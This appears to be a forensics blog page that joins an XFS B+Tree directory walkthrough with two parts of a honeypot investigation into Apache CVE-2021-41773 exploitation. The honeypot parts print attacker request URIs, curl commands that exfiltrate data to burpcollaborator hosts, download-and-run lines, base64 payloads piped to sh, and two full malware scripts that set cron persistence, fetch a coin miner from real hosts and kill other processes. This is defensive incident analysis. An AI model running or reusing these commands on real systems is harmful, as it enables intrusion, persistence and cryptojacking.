XFS Part 6 – B+Tree Directories

Look here for earlier posts in this series.

Just to see what would happen, I created a directory containing 5000 files. Let’s start with the inode:

B+Tree Directory

The number of extents (bytes 76-79) is 0x2A, or 42. This is too many extents to fit in an extent array in the inode. The data fork type (byte 5) is 3, which means the data fork is the root of a B+Tree.
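
If you’d rather not count bytes in a hex editor, xfs_db will read both fields for you. A quick sketch (the exact output formatting here is from memory, so treat it as illustrative):

xfs_db> inode 36654461
xfs_db> print core.format
core.format = 3 (btree)
xfs_db> print core.nextents
core.nextents = 42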

The root of the B+Tree starts at byte offset 176 (0x0B0), right after the inode core. The first two bytes are the level of this node in the tree. The value 1 indicates that this is an interior node in the tree, rather than a leaf node. The next two bytes are the number of entries in the arrays which track the nodes below us in the tree; here there is only one node and one array entry. Four padding bytes are used to maintain 64-bit alignment.

The rest of the space in the data fork is divided into two arrays for tracking sub-nodes. The first array is made up of four-byte logical offset values, tracking where each chunk of file data belongs. The second array holds the absolute block addresses of the nodes which track the extents at the corresponding logical offsets. In our case that block is 0x8118e4 = 8460516 (aka relative block 71908 in AG 2), which tracks the extents starting from the start of the file (logical offset zero).
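
The AG decomposition is just a shift and a mask, so it’s easy to check with shell arithmetic. A small sketch, assuming a shift count of 22 (this is the superblock’s agblklog value, which you can read with “sb 0” and “print agblklog” in xfs_db):

# echo $((8460516 >> 22))
2
# echo $((8460516 & ((1 << 22) - 1)))
71908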

This is a small file system and the absolute block addresses fit in 32 bits. What’s not clear from the documentation is what happens when the file system is large enough to require 64-bit block addresses. More research is needed here.

Let’s examine block 8460516 which holds the extent information. Here are the first 256 bytes in a hex editor:

B+Tree Directory Leaf

0-3     Magic number                        BMA3
4-5     Level in tree                       0 (leaf node)
6-7     Number of extents                   42
8-15    Left sibling pointer                -1 (NULL)

16-23   Right sibling pointer               -1 (NULL)
24-31   Sector offset of this block         0x02595720 = 39409440

32-39   LSN of last update                  0x200000631b
40-55   UUID                                e56c...da71
56-63   Inode owner of this block           0x022f4d7d = 36654461

64-67   CRC32 of this block                 0x9d14d936
68-71   Padding for 64-bit alignment        zeroed

This node is at level zero in the tree, which means it’s a leaf node containing data. In this case the data is extent structures, and there are 42 of them following the header.

If there were more than one leaf node, the left and right sibling pointers would be used. Since we only have the one leaf, both of these values are set to -1, which is used as a NULL pointer in XFS metadata structures.

As far as decoding the extent structures goes, it’s easier to use xfs_db:

xfs_db> inode 36654461
xfs_db> addr u3.bmbt.ptrs[1]
xfs_db> print
magic = 0x424d4133
level = 0
numrecs = 42
leftsib = null
rightsib = null
bno = 39409440
lsn = 0x200000631b
uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
owner = 36654461
crc = 0x9d14d936 (correct)
recs[1-42] = [startoff,startblock,blockcount,extentflag] 
1:[0,4581802,1,0] 
2:[1,4581800,1,0] 
3:[2,4581799,1,0] 
4:[3,4581798,1,0] 
5:[4,4581794,1,0] 
6:[5,4581793,1,0] 
7:[6,4581791,1,0] 
8:[7,4581790,1,0] 
9:[8,4581789,1,0] 
10:[9,4581787,1,0] 
11:[10,4581786,1,0] 
12:[11,4582219,1,0] 
13:[12,4582236,1,0] 
14:[13,4587210,1,0] 
15:[14,4688117,3,0] 
16:[17,4695931,1,0] 
17:[18,4695948,1,0] 
18:[19,4701245,1,0] 
19:[20,4703737,1,0] 
20:[21,4706394,1,0] 
21:[22,4711526,1,0] 
22:[23,4714191,1,0] 
23:[24,4721971,1,0] 
24:[25,4729743,1,0] 
25:[26,4740155,1,0] 
26:[27,4742820,1,0] 
27:[28,4745312,1,0] 
28:[29,4747961,1,0] 
29:[30,4753101,1,0] 
30:[31,4761038,1,0] 
31:[32,4768818,1,0] 
32:[33,4776747,1,0] 
33:[34,4797727,1,0] 
34:[8388608,4581801,1,0] 
35:[8388609,4581796,1,0] 
36:[8388610,4581795,1,0] 
37:[8388611,4581792,1,0] 
38:[8388612,4581788,1,0] 
39:[8388613,8459337,1,0] 
40:[8388614,8460517,2,0] 
41:[8388616,8682827,7,0] 
42:[16777216,4581797,1,0]

As we saw in the previous installment, multi-block directories in XFS are sparse files:

  • Starting at logical offset zero, we have extents 1-33 containing the first 35 blocks of the directory file. This is where the directory entries live.
  • Extents 34-41 starting at logical offset 8388608 (XFS_DIR2_LEAF_OFFSET) contain the hash lookup table for finding directory entries.
  • Because the hash lookup table is large enough to require multiple blocks, the “tail record” for the directory moves into its own block tracked by the final extent (extent 42 in our example above). The logical offset for the tail record is 2*XFS_DIR2_LEAF_OFFSET or 16777216.
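
These magic offsets are easy to sanity-check with shell arithmetic. XFS_DIR2_LEAF_OFFSET is 32GiB, and the logical offsets in the extent list are expressed in file system blocks, which are 4096 bytes on this file system:

# echo $((32 * 1024 * 1024 * 1024 / 4096))
8388608
# echo $((2 * 8388608))
16777216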

The Tail Record

0-3      Magic number                       XDF3
4-7      CRC32 checksum                     0xf56e9aba
8-15     Sector offset of this block        22517032

16-23    Last LSN update                    0x200000631b
24-39    UUID                               e56c...da71
40-47    Inode that points to this block    0x022f4d7d

48-51    Starting block offset              0
52-55    Size of array                      35
56-59    Array entries used                 35
60-63    Padding for 64-bit alignment       zeroed

The last two fields describe an array whose elements correspond to the data blocks of this directory (the 35 blocks holding the directory entries). The array itself follows immediately after the header as shown above. Each element of the array is a two-byte number representing the largest chunk of free space available in each block. In our example, all of the blocks are full (zero free bytes) except for the last block, which has at least a 0x0440 = 1088 byte chunk available.
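
If you’d rather have xfs_db do the decoding, the pattern we used for the extent leaf works here as well. Extent 42 tells us the tail record lives in block 4581797 (a sketch, mirroring the sessions shown elsewhere in this post):

xfs_db> fsblock 4581797
xfs_db> type dir3
xfs_db> print

This prints the header fields plus the free space array described above.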

Decoding the Hash Lookup Table

The hash lookup table for this directory is contained in the fifteen blocks starting at logical file offset 8388608. Because the hash lookup table spans multiple blocks, it is also formatted as a B+Tree. The initial block at logical offset 8388608 should be the root of this tree. This block is shown below.

0-3      "Forward" pointer                  0
4-7      "Back" pointer                     0
8-9      Magic number                       0x3ebe
10-11    Padding for alignment              zeroed
12-15    CRC32 checksum                     0x129cf461

16-23    Sector offset of this block        22517064
24-31    LSN of last update                 0x200000631b

32-47    UUID                               e56c...da71

48-55    Parent inode                       0x022f4d7d
56-57    Number of array entries            14
58-59    Level in tree                      1
60-63    Padding for alignment              zeroed

We confirm this is an interior node of a B+Tree by looking at the “Level in tree” value at bytes 58-59; interior nodes have non-zero values here. The “forward” and “back” pointers being zeroed means there are no other nodes at this level, so we’re sitting at the root of the tree.

The fourteen leaf blocks below the root, which hold the hash lookup entries, are tracked by an array here in the root block. Bytes 56-57 track the size of the array, and the array itself starts at byte 64. Each array entry contains a four-byte hash value and a four-byte logical block offset. The hash value in each array entry is the largest hash value in the given block.

It’s easier to decode these values using xfs_db:

xfs_db> fsblock 4581801
xfs_db> type dir3
xfs_db> p
nhdr.info.hdr.forw = 0
nhdr.info.hdr.back = 0
nhdr.info.hdr.magic = 0x3ebe
nhdr.info.crc = 0x129cf461 (correct)
nhdr.info.bno = 22517064
nhdr.info.lsn = 0x200000631b
nhdr.info.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
nhdr.info.owner = 36654461
nhdr.count = 14
nhdr.level = 1
nbtree[0-13] = [hashval,before]
0:[0x4863b0b3,8388610]
1:[0x4a63d132,8388619]
2:[0x4c63d1f3,8388615]
3:[0x4e63f070,8388622]
4:[0x9c46fd6d,8388612]
5:[0xa446fd6d,8388621]
6:[0xac46fd6d,8388618]
7:[0xb446fd6d,8388616]
8:[0xbc275ded,8388614]
9:[0xbc777c6d,8388609]
10:[0xc463d170,8388611]
11:[0xc863f170,8388620]
12:[0xcc63d072,8388613]
13:[0xce63f377,8388617]

If you look at the residual data in the block after the hash array, it looks like hash values and block offsets similar to what we’ve seen in previous installments. I speculate that this is residual data from when the hash lookup table was able to fit into a single block. Once the directory grew to a point where the B+Tree was necessary, the new B+Tree root node simply took over this block, leaving a significant amount of residual data in the slack space.

To understand the function of the leaf nodes in the B+Tree, suppose we wanted to find the directory entry for the file “0003_smallfile”. First we can use xfs_db to compute the hash value for this filename:

xfs_db> hash 0003_smallfile
0xbc07fded

According to the array, that hash value should be in logical block 8388614. We then have to refer back to the list of extents we decoded earlier to discover that this logical offset corresponds to block address 8460517 (AG 2, block 71909). Here is the breakdown of that block:

0-3      Forward pointer                    0x800001 = 8388609
4-7      Back pointer                       0x800008 = 8388616
8-9      Magic number                       0x3dff
10-11    Padding for alignment              zeroed
12-15    CRC32 checksum                     0xdb227061

16-23    Sector offset of this block        39409448
24-31    LSN of last update                 0x200000631b

32-47    UUID                               e56c...da71

48-55    Parent inode                       0x022f4d7d
56-57    Number of array entries            0x01a0 = 416
58-59    Unused entries                     0
60-63    Padding for alignment              zeroed

Following the 64-byte header is an array holding the hash lookup structures. Each structure contains a four-byte hash value and a four-byte offset. The array is sorted by hash value for binary search. Offsets are in 8-byte units.

The hash value for “0003_smallfile” was 0xbc07fded. We have to look fairly far down in the array to find the offset for this value.

The offset tells us that the directory entry of “0003_smallfile” should be 0x13 = 19 eight-byte units, or 152 bytes, from the start of the directory file. That puts it near the beginning of the first block at logical offset zero.
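
The arithmetic is easy to check from the shell:

# echo $((0x13 * 8))
152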

The Directory Entries

To find the first block of the directory file we need to refer back to the extent list we decoded from the inode at the very start of this article. According to that list, the initial block is 4581802 (AG 1, block 387498). Let’s take a closer look at this block:

0-3      Magic number                       XDD3
4-7      CRC32 checksum                     0xaf173b31
8-15     Sector offset to this block        22517072

16-23    LSN of last update                 0x200000631b
24-39    UUID                               e56c...da71
40-47    Parent inode                       0x022f4d7d

Bytes 48-59 are a three-element array indicating where there is available free space in this block. Each array element is a two-byte offset to the free space and a two-byte length (both in bytes). There is no free space in this block, so all array entries are zeroed. Bytes 60-63 are padding for alignment.

Following this header are variable length directory entries defined as follows:

     Len (bytes)     Field
     ===========     ======
       8             absolute inode number
       1             file name length (bytes)
       varies        file name
       1             file type
       varies        padding as necessary for 64bit alignment
       2             offset to beginning of this entry

Here is the decoding of the directory entries shown above:

    Inode        Len    File Name         Type    Offset
    =====        ===    =========         ====    ========
    0x022f4d7d    1     .                 2       0x0040
    0x04159fa1    2     ..                2       0x0050
    0x022f4d7e   14     0001_smallfile    1       0x0060
    0x022f4d7f   12     0002_bigfile      1       0x0080
    0x022f4d80   14     0003_smallfile    1       0x0098
    0x022f4d81   12     0004_bigfile      1       0x00B8

File type bytes are as described in Part Three of this series (1 is a regular file, 2 is a directory). Note that the starting offset of the “0003_smallfile” entry is 152 bytes (0x0098), exactly as the hash table lookup told us.
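
Once again xfs_db can save some hand-parsing. The same pattern we’ve been using decodes the directory data block (a sketch; block 4581802 comes from the extent list we decoded earlier):

xfs_db> fsblock 4581802
xfs_db> type dir3
xfs_db> print

The output includes one record per directory entry, with the inode number, name, file type, and tag offset we decoded by hand above.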

What Happens Upon Deletion?

Let’s see what happens when we delete “0003_smallfile”. When doing this sort of testing, always be careful to force the file system cache to flush to disk before busting out the trusty hex editor:

# rm -f /root/dir-testing/bigdir/0003_smallfile
# sync; echo 3 > /proc/sys/vm/drop_caches

The mtime and ctime in the directory inode are set to the deletion time of “0003_smallfile”. The LSN and CRC32 checksum in the inode are also updated.

The removal of a single file is typically not a big enough event to modify the size of the directory. In this case, neither the extent tree root nor the leaf block changes. We would have to purge a significant number of files to impact this data.

However, the “tail record” for the directory is impacted by the file deletion.

The CRC32 checksum and LSN (now highlighted in red) are updated. Also the free space array now shows 0x20 = 32 bytes free in the first block.

Again, a single file deletion is not significant enough to impact the root of the hash B+Tree. However, one of the leaf nodes does register the change.

Again we see updates to the CRC32 checksum and LSN fields. The “Unused entries” field for the hash array now shows one unused entry. Looking farther down in the block, we find the unused entry for our hash 0xbc07fded. The offset is zeroed to indicate this entry is unused. We saw similar behavior in other block-based directories in previous installments of this series.

Changes to the directory entries are also similar to the behavior we’ve seen previously for block-based directory files:

Again we see the usual CRC32 and LSN updates. But now the free space array starting at byte 48 shows 0x0020 = 32 bytes free at offset 0x0098 = 152. The first two bytes of the inode field in this directory are overwritten with 0xFFFF to indicate the unused space, and the next two bytes indicate 0x0020 = 32 bytes of free space. However, since the inodes in this file system fit in 32 bits, the original inode number for the file is still fully visible and the file could potentially be recovered using residual data in the inode.
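
To make that concrete: the eight-byte inode field for “0003_smallfile” held 0x00000000022f4d80 before the deletion. Afterwards the field reads 0xFFFF (the “unused” marker), then 0x0020 (the free space length), and then the surviving low-order bytes 0x022f4d80, which still decode to the original inode number:

# echo $((0x022f4d80))
36654464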

Wrapping Up and Planning for the Future

This post concludes my walk-through of the major on-disk data structures in the XFS file system. If anything was unclear or you want more detailed explanations in any area, feel free to reach me through the comments or via any of my social media accounts.

The colorized hex dumps that appear in these posts were made with a combination of Synalize It! and Hexinator. Along the way I created “grammar” files that you can use to produce similar colored breakdowns on your own XFS data structures.

I have multiple pages of research questions that came up as I was working through this series. But what I’m most interested in at the moment is the process of recovering deleted data from XFS file systems. This is what I will be looking at in upcoming posts.


Hudak’s Honeypot (Part 4)

This is part four in a series. Check out part one, part two, and part three if you missed them.

Reviewing the UAC data during the triage phase of our investigation, we noted two similar process hierarchies started on Nov 30. One started with parent PID 15851 and the other with parent PID 21783. The processes were running as the same “daemon” user as the web server. Looking at the UAC data under …/live_response/process/proc/<PID>/environ.txt shows essentially identical markers typical of CVE-2021-41773 exploitation:

HTTP_USER_AGENT=curl/7.79.1
REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash
SCRIPT_NAME=/cgi-bin/../../../../../../../bin/bash
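
The doubled percent-encoding in the request URI takes two rounds of URL decoding before the traversal becomes visible: %32 and %65 first decode to “2” and “e”, yielding %2e, which then decodes to “.”. A quick illustration from the shell:

# python3 -c 'from urllib.parse import unquote; print(unquote(unquote("/cgi-bin/%%32%65%%32%65/bin/bash")))'
/cgi-bin/../bin/bash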

The “environ.txt” data shows that PID 15851 was started by a request from IP 5.2.72.226 and PID 21783 from 104.244.76.13.

Next I pivoted to the web logs in the image under /var/log/apache2, looking for entries that used the same “curl/7.79.1” user agent string. Many of the hits were from 116.202.187.77, which we researched in part three of this series. Here are the remaining hits with the matching user agent string:

107.189.14.119 - - [29/Nov/2021:21:27:46 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//bin/sh HTTP/1.1" 200 45 "-" "curl/7.79.1"
45.153.160.138 - - [29/Nov/2021:21:30:38 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//bin/curl HTTP/1.1" 404 196 "-" "curl/7.79.1"
185.165.171.175 - - [29/Nov/2021:21:33:42 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//bin/sh HTTP/1.1" 200 - "-" "curl/7.79.1"
185.31.175.231 - - [29/Nov/2021:22:07:03 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 53 "-" "curl/7.79.1"
185.56.80.65 - - [29/Nov/2021:22:09:25 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 53 "-" "curl/7.79.1"
185.243.218.50 - - [29/Nov/2021:22:11:50 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 53 "-" "curl/7.79.1"
109.70.100.34 - - [29/Nov/2021:22:13:14 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 53 "-" "curl/7.79.1"
109.70.100.26 - - [30/Nov/2021:16:04:46 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 53 "-" "curl/7.79.1"
5.2.72.226 - - [30/Nov/2021:16:19:28 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 - "-" "curl/7.79.1"
104.244.76.13 - - [30/Nov/2021:16:27:39 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 - "-" "curl/7.79.1"
91.234.192.109 - - [07/Dec/2021:13:57:42 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//bin/sh HTTP/1.1" 200 45 "-" "curl/7.79.1"

All of the IPs shown here are known Tor exit nodes, except for the final IP 91.234.192.109. According to WHOIS data, 91.234.192.109 is registered to Elisteka UAB, a small company in Lithuania.
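
For reference, finding these hits is a one-liner. The access log file names here are an assumption; adjust for however the image rotates its logs:

# grep -h 'curl/7.79.1' /var/log/apache2/access.log* | grep -v '^116.202.187.77'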

Next I pulled the mod_dumpio data for these IPs from the error_log:

[Mon Nov 29 21:27:47.012697 2021]  echo Content-Type: text/plain; echo; id
[Mon Nov 29 21:30:38.095283 2021]  echo Content-Type: text/plain; echo; https://webhook.site/d9680fb0-b157-46a0-bc55-bcd195d139eb
[Mon Nov 29 21:33:42.311129 2021]  echo Content-Type: text/plain; echo;
[Mon Nov 29 22:07:04.059102 2021]  echo Content-Type: text/plain; echo; curl 8u3f3p0skq5deucdmc1xu88qnht8hx.burpcollaborator.net
[Mon Nov 29 22:09:25.063142 2021]  echo Content-Type: text/plain; echo; curl gk4ntxq0ayvl422lckr5kgyydpjh76.burpcollaborator.net
[Mon Nov 29 22:11:50.309729 2021]  echo Content-Type: text/plain; echo; cat /proc/cpuinfo | curl --data-binary @- cs8j1tywiu3hcyahkgz1sc6ullref3.burpcollaborator.net
[Mon Nov 29 22:13:14.410907 2021]  echo Content-Type: text/plain; echo; ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%cpu | head | curl --data-binary @- cs8j1tywiu3hcyahkgz1sc6ullref3.burpcollaborator.net
[Tue Nov 30 16:04:46.326600 2021]  echo Content-Type: text/plain; echo; id | curl --data-binary @- 7jrfbas00fc0onj2p41ovgegm7sxgm.burpcollaborator.net
[Tue Nov 30 16:19:28.956301 2021]  echo Content-Type: text/plain; echo; (curl https://tmpfiles.org/dl/168017/wk.sh | sh >/dev/null 2>&1 )&
[Tue Nov 30 16:27:39.818920 2021]  echo Content-Type: text/plain; echo; (curl https://tmpfiles.org/dl/168017/wk.sh | sh >/dev/null 2>&1 )&
[Tue Dec 07 13:57:42.522498 2021]  echo Content-Type: text/plain; echo; id

Unfortunately, all of these URLs were either unresponsive or returned “Not found” errors. Based on the timestamps, it would have been the “hxxps://tmpfiles.org/dl/168017/wk.sh” requests on Nov 30 that started our suspicious process hierarchies.

In addition to the suspicious process hierarchies started on Nov 30, the UAC data also showed a suspicious agetty process (PID 24330) running as user daemon, started on Dec 5. …/live_response/process/proc/24330/environ.txt showed data matching the …/proc/15851/environ.txt data:

REMOTE_ADDR=5.2.72.226
REMOTE_PORT=47374
HTTP_USER_AGENT=curl/7.79.1

PWD=/tmp
OLDPWD=/tmp

REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash
SCRIPT_NAME=/cgi-bin/../../../../../../../bin/bash
SCRIPT_FILENAME=/bin/bash
CONTEXT_PREFIX=/cgi-bin/
CONTEXT_DOCUMENT_ROOT=/usr/lib/cgi-bin/

The lsof data captured by UAC showed the process binary, /tmp/agettyd, was deleted. But since the process was still running at the time the disk image was captured, the inode data associated with the process executable was not cleared. The lsof data says the inode number is 30248, and recovering the deleted executable is now straightforward:

# icat /dev/loop0 30248 >/tmp/agetty-deleted
# md5sum /tmp/agetty-deleted
e83658008d6d9dc6fe5dbb0138a4942b  /tmp/agetty-deleted
# strings -a /tmp/agetty-deleted
[... snip ...]
Usage: xmrig [OPTIONS]
Network:
  -o, --url=URL                 URL of mining server
  -a, --algo=ALGO               mining algorithm https://xmrig.com/docs/algorithms
      --coin=COIN               specify coin instead of algorithm
  -u, --user=USERNAME           username for mining server
  -p, --pass=PASSWORD           password for mining server
  -O, --userpass=U:P            username:password pair for mining server
[... snip ...]

Ho hum, just another coin miner. Doubtless this is what was burning up the CPU in Tyler’s Azure image.

Wrapping Up

I estimate this investigation took me roughly eight hours, plus another eight hours to write up these blog posts. Is there more to investigate in this image? Most certainly! We’ve only scratched the surface of the mod_dumpio data in /var/log/apache2/error_log. There is still a great deal of data in there to keep your Threat Intel teams happy.

For example, how about this sequence:

[Sun Nov 07 10:39:12.876655 2021]  A=|echo;curl -s http://103.55.36.245/0_cron.sh -o 0_cron.sh || wget -q -O 0_cron.sh http://103.55.36.245/0_cron.sh; chmod 777 0_cron.sh; sh 0_cron.sh
[Sun Nov 07 10:52:33.141762 2021]  A=|echo;curl -s http://103.55.36.245/0_linux.sh -o 0_linux.sh || wget -q -O 0_linux.sh http://103.55.36.245/0_linux.sh; chmod 777 0_linux.sh; sh 0_linux.sh

Both of these URLs are responsive. Here’s “0_cron.sh”:

#!/bin/bash

(crontab -l 2> /dev/null; echo "* * * * * wget -q -O - http://103.55.36.245/0_linux.sh | sh > /dev/null 2>&1")| crontab -
(crontab -l 2> /dev/null; echo "* * * * * curl -s http://103.55.36.245/0_linux.sh | sh > /dev/null 2>&1")| crontab -; rm -rf 0_cron.sh

And here’s “0_linux.sh”:

#!/bin/bash

p=$(ps aux | grep -E 'linuxsys|jailshell' | grep -v grep | wc -l)
if [ ${p} -eq 1 ];then
    echo "Aya keneh proses. Tong waka nya!"
    exit
elif [ ${p} -eq 0 ];then
    echo "Sok bae ngalangkung weh!"
    # Execute linuxsys
    cd /dev/shm ; curl -s http://shumoizolyaciya.12volt.ua/wp-content/config.json -o config.json || wget -q -O config.json http://shumoizolyaciya.12volt.ua/wp-content/config.json; curl -s http://shumoizolyaciya.12volt.ua/wp-content/linuxsys -o linuxsys || wget -q -O linuxsys http://shumoizolyaciya.12volt.ua/wp-content/linuxsys; chmod +x linuxsys; ./linuxsys; rm -rf 0_linux.sh; rm -rf /tmp/*; rm -rf /var/tmp/*; rm -rf /tmp/.*; rm -rf /var/tmp/.*; rm -rf config.json; rm -rf linuxsys;
    # Kill All Process
    killall -9 kinsing; killall -9 kdevtmpfsi; killall -9 .zshrc; pkill -9 kinsing; pkill -9 kdevtmpfsi; pkill -9 .zshrc; pkill -9 lb64; pkill -9 ld-linux-x86-64; pkill -9 apac; pkill -9 sshd; pkill -9 syslogd; pkill -9 apache2; pkill -9 klogd; pkill -9 xmrig; pkill -9 sysls; pkill -9 bash; pkill -9 acpid; pkill -9 httpd; pkill -9 apach; pkill -9 apache; pkill -9 php; pkill -9 logo.gif; pkill -9 cron; pkill -9 go; pkill -9 logrunner; pkill -9 english; pkill -9 perl
fi

Google Translate identifies the language here as Sundanese (“There is still a process…”). Welcome to the global internet, everybody!

Hudak’s Honeypot (Part 3)

This is part three in a series. Follow these links for part one and part two.

During our triage of the UAC data from the honeypot, we noted a process hierarchy running from the deleted /var/tmp/.log/101068/.spoollog directory. Shell process PID 20645 was the parent process of PID 6388, “sleep 300”. Both processes were started on Nov 14 and ran as “daemon”, the same user as the vulnerable web server on the honeypot.

Digging deeper into the UAC data, …/live_response/process/proc/20645/environ.txt provides some more clues about how this process hierarchy started. I’m reorganizing and reproducing some of the more useful data from this file below:

REMOTE_ADDR=116.202.187.77
REMOTE_PORT=56590
HTTP_USER_AGENT=curl/7.79.1

HOME=/var/tmp/.log/101068/.spoollog/.api
PWD=/var/tmp/.log/101068/.spoollog
OLDPWD=/var/tmp
PYTHONUSERBASE=/var/tmp/.log/101068/.spoollog/.api/.mnc

REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
SCRIPT_NAME=/cgi-bin/../../../../bin/sh
SCRIPT_FILENAME=/bin/sh
CONTEXT_PREFIX=/cgi-bin/
CONTEXT_DOCUMENT_ROOT=/usr/lib/cgi-bin/

You can see the typical pattern for the CVE-2021-41773 RCE exploit in the request URI. The home directory and other directory paths match the deleted directory we observed elsewhere in the UAC data. And we can see the source of the malicious request is 116.202.187.77, which according to WHOIS belongs to a German hosting provider, Hetzner.

Nov 14 – So much base64 encoded shell code

Pivoting into the honeypot web logs under /var/log/apache2, we find 80 requests from this IP. There are four requests on Nov 14:

116.202.187.77 - - [14/Nov/2021:01:10:17 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 9 "-" "curl/7.79.1"
116.202.187.77 - - [14/Nov/2021:01:14:04 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 11 "-" "curl/7.79.1"
116.202.187.77 - - [14/Nov/2021:01:25:50 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 5 "-" "curl/7.79.1"
116.202.187.77 - - [14/Nov/2021:03:12:39 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 24 "-" "curl/7.79.1"

The remaining web requests are all from Nov 27 – Dec 1.

But it’s the mod_dumpio data in the error_log that’s really interesting:

[Sun Nov 14 01:10:17.692078 2021]  A=|echo;echo vulnable
[Sun Nov 14 01:14:04.802548 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;curl -s http://116.203.212.184/1010/b64.php -u client:%@123-456@% --data-urlencode 's=aWYgWyAhICIkKHBzIGF1eCB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAgJy5zcmMuc2gnKSIgXTsgdGhlbgoJcHJpbnRmICViICJubyBwcm9jZXNzXG4iCmVsc2UKCXByaW50ZiAlYiAicnVubmluZ1xuIgpmaQo=' | sh
[Sun Nov 14 01:25:50.735008 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;curl -s http://116.203.212.184/1010/b64.php -u client:%@123-456@% --data-urlencode 's=UEFUSD0vc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbjovdXNyL2xvY2FsL2JpbjtpcGF0aD0nbnVsbCc7IGZvciBsaW5lIGluICQoZmluZCAvdmFyL2xvZyAtdHlwZSBkIDI+IC9kZXYvbnVsbCk7IGRvIGlmIFsgLXcgJGxpbmUgXTsgdGhlbiBpcGF0aD0kbGluZTsgYnJlYWs7IGZpOyBkb25lOyBpZiBbICIkaXBhdGgiID0gIm51bGwiIF07IHRoZW4gaXBhdGg9JChjYXQgL2V0Yy9wYXNzd2QgfCBncmVwICJeJCh3aG9hbWkpIiB8IGN1dCAtZDogLWY2KTsgZm9yIGxpbmUgaW4gJChmaW5kICRpcGF0aCAtdHlwZSBkIDI+IC9kZXYvbnVsbCk7IGRvIGlmIFsgLXcgJGxpbmUgXTsgdGhlbiBpcGF0aD0kbGluZTsgYnJlYWs7IGZpOyBkb25lOyBpZiBbICEgLXcgJGlwYXRoIF07IHRoZW4gaXBhdGg9Jy92YXIvdG1wJzsgaWYgWyAhIC13ICRpcGF0aCBdOyB0aGVuIGlwYXRoPScvdG1wJzsgZmk7IGZpOyBmaTsgaWYgWyAhICIkKHBzIGF1eCB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAgJy5zcmMuc2gnKSIgXTsgdGhlbiBjZCAkaXBhdGggJiYgaWYgWyAhIC1kICIubG9nLzEwMTA2OCIgXTsgdGhlbiBpPTEwMTAwMDt3aGlsZSBbICRpIC1uZSAxMDExMDAgXTsgZG8gaT0kKCgkaSsxKSk7IG1rZGlyIC1wIC5sb2cvJGkvLnNwb29sbG9nOyBkb25lICYmIGNkIC5sb2cvMTAxMDY4Ly5zcG9vbGxvZyAmJiBlY2hvICdhcGFjaGUnID4gLnBpbmZvICYmIENVUkw9ImN1cmwiO0RPTT0icnIuYmx1ZWhlYXZlbi5saXZlIjtvdXQ9JChjdXJsIC1zIC0tY29ubmVjdC10aW1lb3V0IDMgaHR0cDovL3JyLmJsdWVoZWF2ZW4ubGl2ZS8xMDEwL29ubGluZS5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIDI+IC9kZXYvbnVsbCk7ZW5hYmxlPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzFdfScpO29ubGluZT0kKGVjaG8gJG91dCB8IGF3ayAne3NwbGl0KCQwLGEsIiwiKTsgcHJpbnQgYVsyXX0nKTsgaWYgWyAhICIkZW5hYmxlIiAtZXEgIjEiIC1hICEgIiRvbmxpbmUiIC1lcSAiMSIgXTsg